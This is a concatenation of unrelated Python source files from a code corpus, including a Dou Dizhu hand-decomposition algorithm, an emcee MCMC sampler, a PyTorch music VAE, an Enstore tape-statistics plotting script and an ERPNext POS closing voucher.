main_take_list.append(self._choose_takes(temp_pairs, main_part, take_count))
elif len(temp_solos) >= take_count:
main_take_list.append(self._choose_takes(temp_solos, main_part, take_count))
elif len(temp_solos) + 2 * len(temp_pairs) >= take_count:
len_solos = len(temp_solos)
main_part = self._choose_takes(temp_solos, main_part, len_solos)
main_take_list.append(
self._choose_takes(
temp_pairs, main_part, (take_count - len_solos) // 2, (take_count - len_solos) % 2 == 1
)
)
else:
main_take_list.append(main_part)
extended_target.extend(main_take_list)
extended_target.sort(key=MOST_VALUE_CMP)
@property
def solos(self) -> List[np.ndarray]:
"""单"""
return self._singles[0]
@property
def pairs(self) -> List[np.ndarray]:
"""对"""
return self._singles[1]
@property
def trios(self) -> List[np.ndarray]:
"""三"""
return self._singles[2]
@property
def trios_take(self):
"""三带M"""
return self._trios_take
@property
def bombs(self) -> List[np.ndarray]:
"""炸弹"""
return self._singles[3]
@property
def bombs_take(self) -> List[np.ndarray]:
"""四带2"""
return self._bombs_take
@property
def planes(self) -> List[np.ndarray]:
"""飞机(不带M)"""
return self._planes
@property
def planes_take(self):
"""飞机(带M)"""
return self._planes_take
@property
def other_seq(self) -> List[np.ndarray]:
"""其它各种序列"""
return self._other_seq
@property
def seq_solo5(self) -> List[np.ndarray]:
"""长度为5的单顺"""
return self._seq_solo5
@property
def has_rocket(self) -> bool:
"""是否有王炸"""
return self._has_rocket
@property
def min_solo(self) -> int:
"""强拆的最小单牌"""
return self._min_solo
@property
def max_solo(self) -> int:
"""强拆的最大单牌"""
return self._max_solo
def __repr__(self):
return 'PlayHand: ' + repr(self.__dict__)
class PlayDecomposer(AbstractDecomposer):
"""
基于贪心法的斗地主出牌时的拆牌算法。
出牌时仅考虑强行拆最大和最小的单牌。其余牌型均按照最佳拆牌给出。
定义c为一张牌,由斗地主规则可知,c ∈ [1, 15] ∩ Z+。
定义s表示当前玩家拥有的所有牌的序列,s = (c1, c2, ..., ci)。
定义a为一次符合斗地主规则的出牌的序列,a = (c1, c2, ..., ci)。
记s下满足规则的所有拆牌动作的集合为A_s,a∈A_s。
用函数D(a)来计算a拆牌的好坏。D(a)定义如下:
D(a) = len(a) + max( max(len(a')) , 1) - 拆炸弹的数量
其中定义域a∈A,值域D(a)∈Z+, a' ∈ s - a
D(a)越大,拆牌越合理。
算法如下:
1. 将s分成连续的若干段、二和大小王,例如(1,1,2,2,5,5,7,10,13,14)分成(1,1,2,2) (5,5,) (7) (10) (13) (14)
2. 将大小王和二加入到最佳拆牌序列A‘中
3. 对每一段序列si,计算不带牌的动作a的 D(a)
4. 合并主牌和带牌的D(a)
5. 输出argmax(D(a))
"""
def __init__(self):
self.cards_q_maps_list: Optional[List[Dict[int, List[np.ndarray]]]] = None
def _map_actions(self, actions, q_list, max_q: int, idx: int):
for a, q in zip(actions, q_list):
if max_q == q:
self.cards_q_maps_list[idx][max_q - q].append(a)
def get_good_plays(self, cards: np.ndarray) -> PlayHand:
"""
获取较好的出牌行动。
@param cards: 当前手牌。
@return: 包含所有好的出牌类型的数组
"""
self._process_card(cards)
self.cards_q_maps_list = [defaultdict(list), defaultdict(list),
defaultdict(list), defaultdict(list),
defaultdict(list), defaultdict(list)]
play_hand = PlayHand(np.min(cards), np.max(cards))
for lt2_state in self._lt2_states:
if lt2_state.size > 0:
max_q = self._get_all_actions_and_q_lists(lt2_state)
i = 0
for actions, q_list in zip(self._actions, self._q_lists):
self._map_actions(actions, q_list, max_q, i)
i += 1
if self.cards_q_maps_list[0].keys() and self.cards_q_maps_list[1].keys():
min_key = min(self.cards_q_maps_list[0].keys())
min_key2 = min(self.cards_q_maps_list[1].keys())
self.cards_q_maps_list[0][min_key] = [i for i in self.cards_q_maps_list[0][min_key] if
i[0] not in np.unique(self.cards_q_maps_list[1][min_key2])]
if self.card2_count:
self.cards_q_maps_list[self.card2_count - 1][0].append(np.array([CARD_2] * self.card2_count))
if self._ghosts.size == 2:
play_hand._has_rocket = True
elif self._ghosts.size == 1:
self.cards_q_maps_list[0][0].append(self._ghosts)
play_hand.add_to_hand(self.cards_q_maps_list)
return play_hand
def get_next_state(state: np.ndarray, action: np.ndarray) -> np.ndarray:
"""
获取状态做出动作后的的下一个状态
@param state: 状态
@param action: 动作
@return: 下一个状态
"""
next_state = list(state)
for card in action:
next_state.remove(card)
return np.array(next_state)
def _get_single_actions(state: np.ndarray, length: int) -> List[List[int]]:
"""
获取所有单种牌面的动作(单,对,三,炸弹)
@param state: 状态
@param length: 动作长度
"""
result = []
last_card = -1
state = list(state)
for i in range(length, len(state) + 1):
if state[i - 1] == state[i - length] and state[i - 1] != last_card and (
state.count(state[i - 1]) < 4 or length % 2 == 0):
last_card = state[i - 1]
result.append([last_card] * length)
return result
def _get_seq_actions(card_list: list, kind: int, length: int) -> List[List[int]]:
"""
获取顺子/连对/飞机/炸弹的动作(单,对,三,炸弹)
"""
result = []
for i in range(length - 1, len(card_list)):
if card_list[i] == card_list[i - length + 1] + length - 1:
result.append(sorted(card_list[i - length + 1: i + 1] * kind))
return result
| StarcoderdataPython |
9743630 | # coding: utf-8
"""
Base para desarrollo de modulos externos.
Para obtener el modulo/Funcion que se esta llamando:
GetParams("module")
Para obtener las variables enviadas desde formulario/comando Rocketbot:
var = GetParams(variable)
Las "variable" se define en forms del archivo package.json
Para modificar la variable de Rocketbot:
SetVar(Variable_Rocketbot, "dato")
Para obtener una variable de Rocketbot:
var = GetVar(Variable_Rocketbot)
Para obtener la Opcion seleccionada:
opcion = GetParams("option")
Para instalar librerias se debe ingresar por terminal a la carpeta "libs"
pip install <package> -t .
"""
import difflib
"""
Obtengo el modulo que fueron invocados
"""
module = GetParams("module")
if module == "diff_ratio":
str_1 = GetParams("str1")
str_2 = GetParams("str2")
result = GetParams("result")
try:
ratio = difflib.SequenceMatcher(None, str_1, str_2).ratio()
SetVar(result, ratio)
except Exception as e:
PrintException()
raise e
if module == "replace":
old_str = GetParams("old")
new_str = GetParams("new")
var = GetParams("var")
result = GetParams("result")
try:
new_var = var.replace(old_str, new_str)
SetVar(result, new_var)
except Exception as e:
PrintException()
raise e
if module == "split":
var = GetParams("var")
delimiter = GetParams("delimiter")
result = GetParams("result")
try:
new_var = var.split(delimiter)
SetVar(result, new_var)
except Exception as e:
PrintException()
raise e
if module == "find":
var = GetParams("var")
data = GetParams("data")
result = GetParams("result")
try:
new_var = var.find(data)
SetVar(result, new_var)
except Exception as e:
PrintException()
raise e
if module == "reverse":
string = GetParams("string")
result = GetParams("result")
reverse_string = string[::-1]
if result:
SetVar(result, reverse_string)
| StarcoderdataPython |
1632063 | '''
Define the function related with the Markov Chain Monter Carlo (MCMC) process.
'''
import numpy as np
import emcee
import time
import os
import git
path_git = git.Repo('.', search_parent_directories=True).working_tree_dir
path_datos_global = os.path.dirname(path_git)
def MCMC_sampler(log_probability, initial_values,
filename = "default.h5",
witness_file = 'witness.txt',
max_samples = 10000,
witness_freq = 100,
tolerance = 0.01,
save_path = path_datos_global+'/Resultados_cadenas/'):
'''
log_probability: logarithm of the posterior distribution that will be sampled.
initial_values: object that contains the initial value of the parameters to sample
filename: name of the h5 file that contains the chains information.
witness_file: name of the witness file.
max_samples: maximun number of sample, if the chains not converge.
witness_freq: frequency use to print the state of the calculation in the witness file.
tolerance: tolerance parameter on the convergence method.
save_path: directory in which the outputs are stored. Change this atribute on the
configuration file is recommended .
'''
nwalkers, ndim = initial_values.shape
# Set up the backend
os.chdir(save_path)
backend = emcee.backends.HDFBackend(filename)
backend.reset(nwalkers, ndim) # Don't forget to clear it in case the file already exists
textfile_witness = open(witness_file,'w+')
textfile_witness.close()
#%%
#Initialize the sampler
sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability, backend=backend)
#sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability, backend=backend,
# moves=[(emcee.moves.DEMove(), 0.4), (emcee.moves.DESnookerMove(), 0.3)
# , (emcee.moves.KDEMove(), 0.3)])
# This will be useful to testing convergence
old_tau = np.inf
t1 = time.time()
# Now we'll sample for up to max_samples steps
for sample in sampler.sample(initial_values, iterations=max_samples, progress=True):
# Only check convergence every 'witness_freq' steps
if sampler.iteration % witness_freq: #'witness_freq' es cada cuanto chequea convergencia
continue
os.chdir(save_path)
textfile_witness = open(witness_file,'w')
textfile_witness.write('Número de iteración: {} \t'.format(sampler.iteration))
t2 = time.time()
textfile_witness.write('Duración {} minutos y {} segundos'.format(int((t2-t1)/60),
int((t2-t1) - 60*int((t2-t1)/60))))
textfile_witness.close()
# Compute the autocorrelation time so far
# Using tol=0 means that we'll always get an estimate even
# if it isn't trustworthy
tau = sampler.get_autocorr_time(tol=0)
# Check convergence
converged = np.all(tau * 100 < sampler.iteration) #100 es el threshold de convergencia
#También pido que tau se mantenga relativamente constante:
converged &= np.all((np.abs(old_tau - tau) / tau) < tolerance)
if converged:
textfile_witness = open(witness_file,'a')
textfile_witness.write('\n Convergió!')
textfile_witness.close()
break
old_tau = tau
| StarcoderdataPython |
5162144 | from vizdoomgym.envs.vizdoomenv import VizdoomEnv
class VizdoomTakeCover(VizdoomEnv):
def __init__(self):
super(VizdoomTakeCover, self).__init__(7)
| StarcoderdataPython |
12853147 | from blocksync._consts import ByteSizes
from blocksync._status import Blocks
def test_initialize_status(fake_status):
# Expect: Set chunk size
assert fake_status.chunk_size == fake_status.src_size // fake_status.workers
def test_add_block(fake_status):
# Expect: Add each blocks and calculate done block
fake_status.add_block("same")
fake_status.add_block("same")
fake_status.add_block("diff")
assert fake_status.blocks == Blocks(same=2, diff=1, done=3)
def test_get_rate(fake_status):
# Expect: Return 0.00 when nothing done
assert fake_status.rate == 0.00
fake_status.block_size = ByteSizes.MiB
fake_status.src_size = fake_status.dest_size = ByteSizes.MiB * 10
# Expect: Return 50.00 when half done
fake_status.add_block("same")
fake_status.add_block("same")
fake_status.add_block("same")
fake_status.add_block("diff")
fake_status.add_block("diff")
assert fake_status.rate == 50.00
# Expect: Return 100.00 when all done
fake_status.add_block("same")
fake_status.add_block("same")
fake_status.add_block("same")
fake_status.add_block("diff")
fake_status.add_block("diff")
assert fake_status.rate == 100.00
# Expect: Return 100.00 when exceeding the total size
fake_status.add_block("diff")
assert fake_status.rate == 100.00
| StarcoderdataPython |
4925301 | #!/usr/bin/env python
"""Unit test for ..."""
import requests
import unittest
from sagas.ofbiz.entities import MetaEntity
class TestSimple(unittest.TestCase):
"""Class to execute unit tests for api.py."""
@classmethod
def setUpClass(self):
"""Set up function called when class is consructed."""
self.base_url = 'http://127.0.0.1:5000/graphql'
self.headers = {'content-type': 'application/json'}
@classmethod
def tearDownClass(self):
"""Tear down function called when class is deconstructed."""
pass
def test_simple(self):
entity = MetaEntity("Product")
print(entity.primary)
rec = entity.find_one(productId='10005')
print(rec['internalName'])
recs = entity.find_list(5, 0)
print(len(recs))
for r in recs:
print(r['internalName'])
product_id = "10013"
entity = MetaEntity("Product")
rec = entity.find_one(productId=product_id)
print(rec['description'])
if __name__ == '__main__':
# Test api endpoints
suite = unittest.TestLoader().loadTestsFromTestCase(TestSimple)
unittest.TextTestRunner(verbosity=2).run(suite)
| StarcoderdataPython |
3319917 | <gh_stars>0
import string
def replace_use_template(strObj):
# New style in python2.4
new_style = string.Template('This is $thing')
strA = new_style.substitute(thing=2)
print strA
strB = new_style.substitute({'thing': 10})
print strB
#Old style in python2.3
old_style = 'This is %(thing)s'
strC = old_style % {'thing' : 'love'}
print strC
if __name__ == '__main__':
replace_use_template('')
| StarcoderdataPython |
4914620 | <gh_stars>1-10
import json
from pony.orm import db_session
from blogsley.user import User
class Schemata:
def __init__(self):
self.typename = self.__class__.__name__
def wire(self):
return {}
class Connection(Schemata):
def __init__(self, objs, edge_class, node_class):
super().__init__()
self.edges = []
self.pageInfo = None
for obj in objs:
self.edges.append(edge_class(obj, node_class))
def wire(self):
result = {
'__typename': self.typename,
'edges': [edge.wire() for edge in self.edges],
'pageInfo': self.pageInfo
}
return result
class Edge(Schemata):
def __init__(self, obj, node_class):
super().__init__()
self.cursor = ""
self.node = node_class(obj)
def wire(self):
result = {
'__typename': self.typename,
'cursor': self.cursor,
'node': self.node.wire()
}
return result
class Node(Schemata):
def __init__(self, objekt):
super().__init__()
self.objekt = objekt
def wire(self):
result = self.objekt.to_dict()
result['__typename'] = self.typename,
return result
class UserConnection(Connection):
def __init__(self, objs):
super().__init__(objs, edge_class=UserEdge, node_class=UserNode)
class UserEdge(Edge):
def __init__(self, obj, node_class):
super().__init__(obj, UserNode)
class UserNode(Node):
def __init__(self, objekt):
super().__init__(objekt)
@db_session
def test():
#Users = User.select()
users = [u for u in User.select()]
for u in users:
print(u.id, u.username)
connection = UserConnection(users)
print(connection.wire())
if __name__ == "__main__":
test()
| StarcoderdataPython |
9727850 | <reponame>KMU-AELAB-MusicProject/MusicGeneration_VAE-torch<filename>graph/model.py
import torch
import torch.nn as nn
from .decoder import Decoder
from .encoder import Encoder
from .phrase_encoder import PhraseModel
from .refiner import Refiner
from graph.weights_initializer import weights_init
class Model(nn.Module):
def __init__(self):
super().__init__()
self.encoder = Encoder([64, 128, 256, 512, 1024])
self.decoder = Decoder([1024, 512, 256, 128, 64])
self.phrase_encoder = PhraseModel([64, 128, 256, 512, 1024])
self.refiner = Refiner()
self.apply(weights_init)
def forward(self, note, pre_note, phrase, position, is_train=True):
if is_train:
phrase_feature = self.phrase_encoder(phrase)
z = self.encoder(note)
pre_z = self.encoder(pre_note)
gen_note = self.decoder(z, pre_z, phrase_feature, position)
refined_gen_note = self.refiner(gen_note)
return refined_gen_note, z, pre_z, phrase_feature
else:
phrase_feature = self.phrase_encoder(phrase)
pre_z = self.encoder(pre_note)
gen_note = self.decoder(note, pre_z, phrase_feature, position)
return self.refiner(gen_note)
| StarcoderdataPython |
1889995 | <filename>inst/test_module.py
def f1(a=3, type="linear"):
"""
Initialize the model.
Parameters
----------
a : int, optional
Description for a.
Defaults to 3.
type : str, optional
Type of algorithm (default: "linear")
"linear" - linear model
"nonlinear" - nonlinear model
Returns
-------
values : array-like
Section1
-----------
Just a placeholder here.
"""
return a
| StarcoderdataPython |
9727334 | <reponame>iamlemec/valjax
from operator import mul
from itertools import accumulate
from collections import OrderedDict
from inspect import signature
import toml
import jax
import jax.numpy as np
import jax.tree_util as tree
##
## indexing tricks
##
def get_strides(shape):
return tuple(accumulate(shape[-1:0:-1], mul, initial=1))[::-1]
# index: [N, K] matrix or tuple of K [N] vectors
def ravel_index(index, shape):
idxmat = np.stack(index, axis=-1)
stride = np.array(get_strides(shape))
return np.dot(idxmat, stride)
def ensure_tuple(x):
if type(x) not in (tuple, list):
return (x,)
else:
return x
##
## special functions
##
# classic bounded smoothstep
def smoothstep(x):
return np.where(x > 0, np.where(x < 1, 3*x**2 - 2*x**3, 1), 0)
##
## parameters
##
# (-∞,∞) → (-∞,∞)
def ident(x):
return x
# (-∞,∞) → (0,1)
def logit(x):
return 1/(1+np.exp(-x))
# (0,1) → (-∞,∞)
def rlogit(x):
return np.log(x/(1-x))
# returns encode/decode pair
def spec_funcs(s):
if s == 'ident':
return ident, ident
elif s == 'log':
return np.log, np.exp
elif s == 'logit':
return rlogit, logit
else:
return s
def argpos(fun, arg):
sig = signature(fun)
t = type(arg)
if t is str:
names = list(sig.parameters)
pos = names.index(arg)
elif t is int:
n = len(sig.parameters)
pos = arg + n if arg < 0 else arg
return pos
# encode: map from true space to free space
# decode: map from free space to true space
class Spec:
def __init__(self, spec):
self.spec = tree.tree_map(spec_funcs, spec)
def encode(self, x):
return tree.tree_map(lambda v, s: s[0](v), x, self.spec)
def decode(self, x):
return tree.tree_map(lambda v, s: s[1](v), x, self.spec)
def decoder(self, fun0, arg=0):
pos = argpos(fun0, arg)
def fun1(*args, **kwargs):
args1 = (
self.decode(a) if i == pos else a for i, a in enumerate(args)
)
return fun0(*args1, **kwargs)
return fun1
def decodify(self, fun=None, arg=0):
if fun is None:
def decor(fun0):
return self.decoder(fun0, arg)
return decor
else:
return self.decoder(fun, arg)
##
## function tools
##
def partial(fun, *args, argnums=None):
nargs = len(args)
if argnums is None:
argnums = list(range(nargs))
elif type(argnums) is int:
argnums = [argnums]
assert(nargs == len(argnums))
def fun1(*args1, **kwargs1):
ntot = nargs + len(args1)
idx = [i for i in range(ntot) if i not in argnums]
idx1 = {j: i for i, j in enumerate(idx1)}
args2 = [args[i] if i in argnums else args1[idx1[i]]]
return fun(*args2, **kwargs1)
return fun1
| StarcoderdataPython |
3364764 | <filename>Lecture_4_Tasks.py
"""Euler Method for the equation dy/dx = -y"""
import numpy as np
import matplotlib.pyplot as plt
import math as m
x_initial = 0
y_initial = 1
x_final = 1
h = 0.02
step = m.ceil(x_final/h)
y_euler = []
x_euler = []
y_euler.append(y_initial)
x_euler.append(x_initial)
def equation(y,x):
k = -1
dydx = k*y
return dydx
for i in range(step):
element= x_euler[i] + h
x_euler.append(element)
slope = equation(y_euler[i],x_euler[i])
element_2 = y_euler[i] + h*slope
y_euler.append(element_2)
plt.plot(x_euler,y_euler)
plt.show()
| StarcoderdataPython |
3547206 | <reponame>Shumpei-Kikuta/BentoML
import gzip
import json
import os
from bentoml.types import HTTPRequest, InferenceTask
TF_B64_KEY = "b64"
class B64JsonEncoder(json.JSONEncoder):
""" Special json encoder for numpy types """
def default(self, o): # pylint: disable=method-hidden
import base64
if isinstance(o, bytes):
try:
return o.decode('utf-8')
except UnicodeDecodeError:
return {TF_B64_KEY: base64.b64encode(o).decode("utf-8")}
try:
return super(B64JsonEncoder, self).default(o)
except (TypeError, OverflowError):
return {"unknown_obj": str(o)}
class NumpyJsonEncoder(B64JsonEncoder):
""" Special json encoder for numpy types """
def default(self, o): # pylint: disable=method-hidden
import numpy as np
if isinstance(o, np.generic):
return o.item()
if isinstance(o, np.ndarray):
return o.tolist()
return super(NumpyJsonEncoder, self).default(o)
class TfTensorJsonEncoder(NumpyJsonEncoder):
""" Special json encoder for numpy types """
def default(self, o): # pylint: disable=method-hidden
import tensorflow as tf
# Tensor -> ndarray or object
if isinstance(o, tf.Tensor):
if tf.__version__.startswith("1."):
with tf.compat.v1.Session():
return o.numpy()
else:
return o.numpy()
return super(TfTensorJsonEncoder, self).default(o)
def concat_list(lst, batch_flags=None):
"""
>>> lst = [
[1],
[1, 2],
[1, 2, 3],
None,
]
>>> concat_list(lst)
[1, 1, 2, 1, 2, 3], [slice(0, 1), slice(1, 3), slice(3, 6), None]
"""
slices = [slice(0)] * len(lst)
datas = []
row_flag = 0
for i, r in enumerate(lst):
if r is None:
slices[i] = None
continue
j = -1
if batch_flags is None or batch_flags[i]:
for j, d in enumerate(r):
datas.append(d)
slices[i] = slice(row_flag, row_flag + j + 1)
else:
datas.append(r)
slices[i] = row_flag
j += 1
row_flag += j + 1
return datas, slices
def check_file_extension(file_name, accept_ext_list):
"""
Return False if file's extension is not in the accept_ext_list
"""
if not file_name:
return False
_, extension = os.path.splitext(file_name)
return extension.lower() in (accept_ext_list or [])
def get_default_accept_image_formats():
"""With default bentoML config, this returns:
['.jpg', '.png', '.jpeg', '.tiff', '.webp', '.bmp']
"""
from bentoml import config
return [
extension.strip()
for extension in config("apiserver")
.get("default_image_input_accept_file_extensions")
.split(",")
]
def decompress_gzip_request(method):
def _method(self, req: HTTPRequest) -> InferenceTask:
if req.headers.content_encoding in {"gzip", "x-gzip"}:
# https://tools.ietf.org/html/rfc7230#section-4.2.3
try:
req.body = gzip.decompress(req.body)
except OSError:
return InferenceTask().discard(
http_status=400, err_msg="Gzip decompression error"
)
req.headers.pop("content-encoding")
return method(self, req)
return method(self, req)
return _method
| StarcoderdataPython |
359772 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
''' Toolbar preprocessing code. Turns all IDS_COMMAND macros in the RC file
into simpler constructs that can be understood by GRIT. Also deals with
expansion of $lf; placeholders into the correct linefeed character.
'''
import preprocess_interface
from grit import lazy_re
class ToolbarPreProcessor(preprocess_interface.PreProcessor):
''' Toolbar PreProcessing class.
'''
_IDS_COMMAND_MACRO = lazy_re.compile(
r'(.*IDS_COMMAND)\s*\(([a-zA-Z0-9_]*)\s*,\s*([a-zA-Z0-9_]*)\)(.*)')
_LINE_FEED_PH = lazy_re.compile(r'\$lf;')
_PH_COMMENT = lazy_re.compile(r'PHRWR')
_COMMENT = lazy_re.compile(r'^(\s*)//.*')
def Process(self, rctext, rcpath):
''' Processes the data in rctext.
Args:
rctext: string containing the contents of the RC file being processed
rcpath: the path used to access the file.
Return:
The processed text.
'''
ret = ''
rclines = rctext.splitlines()
for line in rclines:
if self._LINE_FEED_PH.search(line):
# Replace "$lf;" placeholder comments by an empty line.
# this will not be put into the processed result
if self._PH_COMMENT.search(line):
mm = self._COMMENT.search(line)
if mm:
line = '%s//' % mm.group(1)
else:
# Replace $lf by the right linefeed character
line = self._LINE_FEED_PH.sub(r'\\n', line)
# Deal with IDS_COMMAND_MACRO stuff
mo = self._IDS_COMMAND_MACRO.search(line)
if mo:
line = '%s_%s_%s%s' % (mo.group(1), mo.group(2), mo.group(3), mo.group(4))
ret += (line + '\n')
return ret
| StarcoderdataPython |
6659298 | #!/usr/bin/env python
# $Id$
import sys
import popen2
import os
import string
import time
def generate_date():
d1 = None
for when in 'date --date "1 month ago" +"%b-%d-%y"','date +"%b-%d-%y"':
d = os.popen(when,'r')
dat=d.readlines()
d.close()
if d1 == None:
d1 = dat[0][:-1]
d1.upper()
else:
d2 = dat[0][:-1]
d2.upper()
print 'Generating burn-rate plots from', d1, ' to ',d2
return d1, d2
def get_stats(host, port, start_date=None, finish_date=None):
date_fmt = "'YY-MM-DD HH24:MI'"
if start_date and finish_date:
query_cmd='psql -h %s -p %s -o "write_tabs_%s.report" -c \
"select to_char(date, %s),total, should, not_yet, done from write_protect_summary\
where date(time) between date(%s%s%s) and date(%s%s%s) \
and mb_user_write != 0 order by date desc;" enstore'
pipeObj = popen2.Popen3(query_cmd%(host, port, host, date_fmt, "'", start_date, "'", "'", finish_date, "'"), 0, 0)
else:
query_cmd='psql -h %s -p %s -o "write_tabs_%s.report" -c \
"select to_char(date, %s),total, should, not_yet, done from write_protect_summary\
order by date desc;" enstore'
pipeObj = popen2.Popen3(query_cmd%(host, port, host, date_fmt), 0, 0)
if pipeObj is None:
sys.exit(1)
stat = pipeObj.wait()
result = pipeObj.fromchild.readlines() # result has returned string
def make_plot_file(host):
f=open("write_tabs_%s.report"%(host,),'r')
of=open("write_tabs_%s"%(host,),'w')
l = f.readline()
first = 1
while 1:
l = f.readline()
if l:
a = l.split('|')
if len(a) == 5:
if first:
s,n,d = int(a[2]), int(a[3]), int(a[4])
first = 0
a[4] = str(int(a[4][:-1])+int(a[3]))
lo = string.join(a)
of.write("%s\n"%(lo,))
else:
break
return s,n,d
def make_plot(host, should, not_done, done):
t = time.ctime(time.time())
f = open("write_tabs_%s.gnuplot"%(host,),'w')
f.write('set terminal postscript color solid\n')
f.write('set output "write_tabs_%s.ps"\n' % (host,))
f.write('set title "Write Tabs States for %s."\n'%(host,))
f.write('set xlabel "Date (year-month-day)"\n')
f.write('set timefmt "%Y-%m-%d"\n')
f.write('set xdata time\n')
#f.write('set size 1.5,1\n')
f.write('set xrange [ : ]\n')
f.write('set grid\n')
f.write('set yrange [0: ]\n')
f.write('set format x "%y-%m-%d"\n')
f.write('set ylabel "# tapes that should have write tabs ON"\n')
f.write('set label "Plotted %s " at graph .99,0 rotate font "Helvetica,10"\n' % (t,))
f.write('set label "Should %s, Done %s(%3.1f%%), Not Done %s." at graph .05,.90\n' % (should, done, done*100./should, not_done))
#f.write('plot "write_tabs_%s" using 1:10 t "ON" w impulses lw %s 3 1 using 1:8 t "OFF" w impulses lw %s 1 1\n'%
# (host, 20, 20))
f.write('plot "write_tabs_%s" using 1:6 t "ON" w impulses lw %s lt 2, "write_tabs_%s" using 1:5 t "OFF" w impulses lw %s lt 1\n'%
(host, 20, host, 20))
#f.write('plot "write_tabs_%s" using 1:10 t "ON" w impulses lw %s 3 1\n'%(host, 20))
f.close()
for cmd in '/usr/bin/gnuplot write_tabs_%s.gnuplot' % (host,),\
'/usr/X11R6/bin/convert -flatten -background lightgray -rotate 90 -modulate 80 write_tabs_%s.ps write_tabs_%s.jpg' % (host,host),\
'/usr/X11R6/bin/convert -flatten -background lightgray -rotate 90 -geometry 120x120 -modulate 80 write_tabs_%s.ps write_tabs_%s_stamp.jpg' % (host,host):
os.system(cmd)
cmd = '$ENSTORE_DIR/sbin/enrcp *.ps *.jpg stkensrv2:/fnal/ups/prd/www_pages/enstore/write_tabs'
os.system(cmd)
#d1, d2 = generate_date()
for h in "stkensrv6", "d0ensrv6", "cdfensrv6":
get_stats(h, 5432)
should, not_done, done = make_plot_file(h)
make_plot(h,should, not_done, done)
| StarcoderdataPython |
3352958 | <reponame>fderyckel/pos_bahrain<gh_stars>10-100
# -*- coding: utf-8 -*-
# pylint: disable=no-member,access-member-before-definition
# Copyright (c) 2018, 9t9it and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import json
import frappe
from frappe.utils import get_datetime, flt, cint
from frappe.model.document import Document
from toolz import merge, compose, pluck, excepts, first, unique, concatv, reduceby
from functools import partial
from pos_bahrain.utils import pick, sum_by
class POSClosingVoucher(Document):
def validate(self):
clauses = concatv(
[
"docstatus = 1",
"name != %(name)s",
"company = %(company)s",
"pos_profile = %(pos_profile)s",
"period_from <= %(period_to)s",
"period_to >= %(period_from)s",
],
["user = %(user)s"] if self.user else [],
)
existing = frappe.db.sql(
"""
SELECT 1 FROM `tabPOS Closing Voucher` WHERE {clauses}
""".format(
clauses=" AND ".join(clauses)
),
values={
"name": self.name,
"company": self.company,
"pos_profile": self.pos_profile,
"user": self.user,
"period_from": get_datetime(self.period_from),
"period_to": get_datetime(self.period_to),
},
)
if existing:
frappe.throw(
"Another POS Closing Voucher already exists during this time frame."
)
def before_insert(self):
if not self.period_from:
self.period_from = get_datetime()
def before_submit(self):
if not self.period_to:
self.period_to = get_datetime()
self.set_report_details()
get_default_collected = compose(
lambda x: x.collected_amount if x else 0,
excepts(StopIteration, first, lambda x: None),
partial(filter, lambda x: cint(x.is_default) == 1),
)
self.closing_amount = self.opening_amount + get_default_collected(self.payments)
def set_report_details(self):
args = merge(
pick(["user", "pos_profile", "company"], self.as_dict()),
{
"period_from": get_datetime(self.period_from),
"period_to": get_datetime(self.period_to),
},
)
sales, returns = _get_invoices(args)
actual_payments, collection_payments = _get_payments(args)
taxes = _get_taxes(args)
def make_invoice(invoice):
return merge(
pick(["grand_total", "paid_amount", "change_amount"], invoice),
{
"invoice": invoice.name,
"total_quantity": invoice.pos_total_qty,
"sales_employee": invoice.pb_sales_employee,
},
)
def make_payment(payment):
mop_conversion_rate = (
payment.amount / payment.mop_amount if payment.mop_amount else 1
)
expected_amount = (
payment.amount - sum_by("change_amount", sales)
if payment.is_default
else (payment.mop_amount or payment.amount)
)
return merge(
pick(["is_default", "mode_of_payment", "type"], payment),
{
"mop_conversion_rate": mop_conversion_rate,
"collected_amount": expected_amount,
"expected_amount": expected_amount,
"difference_amount": 0,
"mop_currency": payment.mop_currency
or frappe.defaults.get_global_default("currency"),
"base_collected_amount": expected_amount * flt(mop_conversion_rate),
},
)
make_tax = partial(pick, ["rate", "tax_amount"])
get_employees = partial(
pick, ["pb_sales_employee", "pb_sales_employee_name", "grand_total"]
)
self.returns_total = sum_by("grand_total", returns)
self.returns_net_total = sum_by("net_total", returns)
self.grand_total = sum_by("grand_total", sales + returns)
self.net_total = sum_by("net_total", sales + returns)
self.outstanding_total = sum_by("outstanding_amount", sales)
self.total_invoices = len(sales + returns)
self.average_sales = sum_by("net_total", sales) / len(sales) if sales else 0
self.total_quantity = sum_by("pos_total_qty", sales)
self.returns_quantity = -sum_by("pos_total_qty", returns)
self.tax_total = sum_by("tax_amount", taxes)
self.discount_total = sum_by("discount_amount", sales)
self.change_total = sum_by("change_amount", sales)
self.total_collected = (
sum_by("amount", actual_payments)
+ sum_by("amount", collection_payments)
- self.change_total
)
self.invoices = []
for invoice in sales:
self.append("invoices", make_invoice(invoice))
self.returns = []
for invoice in returns:
self.append("returns", make_invoice(invoice))
existing_payments = self.payments
def get_form_collected(mop):
existing = compose(
excepts(StopIteration, first, lambda x: None),
partial(filter, lambda x: x.mode_of_payment == mop),
)(existing_payments)
if not existing or existing.collected_amount == existing.expected_amount:
return {}
return {"collected_amount": existing.collected_amount}
self.payments = []
for payment in actual_payments:
self.append(
"payments",
merge(
make_payment(payment), get_form_collected(payment.mode_of_payment)
),
)
for payment in collection_payments:
collected_payment = merge(
make_payment(payment), get_form_collected(payment.mode_of_payment)
)
existing_payments = list(
filter(
lambda x: x.mode_of_payment == collected_payment["mode_of_payment"],
self.payments,
)
)
if existing_payments:
existing_payment = first(existing_payments)
for field in [
"expected_amount",
"collected_amount",
"difference_amount",
"base_collected_amount",
]:
existing_payment.set(
field,
sum(
[
existing_payment.get(field),
collected_payment.get(field, 0),
]
),
)
else:
self.append("payments", collected_payment)
self.taxes = []
for tax in taxes:
self.append("taxes", make_tax(tax))
self.employees = []
employee_with_sales = compose(list, partial(map, get_employees))(sales)
employees = compose(
list, unique, partial(map, lambda x: x["pb_sales_employee"])
)(employee_with_sales)
for employee in employees:
sales_employee_name = compose(
first, partial(filter, lambda x: x["pb_sales_employee"] == employee)
)(employee_with_sales)["pb_sales_employee_name"]
sales = compose(
list,
partial(map, lambda x: x["grand_total"]),
partial(filter, lambda x: x["pb_sales_employee"] == employee),
)(employee_with_sales)
self.append(
"employees",
{
"sales_employee": employee,
"sales_employee_name": sales_employee_name,
"invoices_count": len(sales),
"sales_total": sum(sales),
},
)
self.item_groups = []
for row in _get_item_groups(args):
